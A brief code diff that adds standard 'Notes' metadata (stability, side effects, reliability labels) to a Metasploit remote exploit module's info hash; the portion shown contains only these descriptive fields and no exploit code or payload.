@@ -37,7 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => false,
         'DisclosureDate' => '2020-03-12',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ CONFIG_CHANGES, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
     register_options([
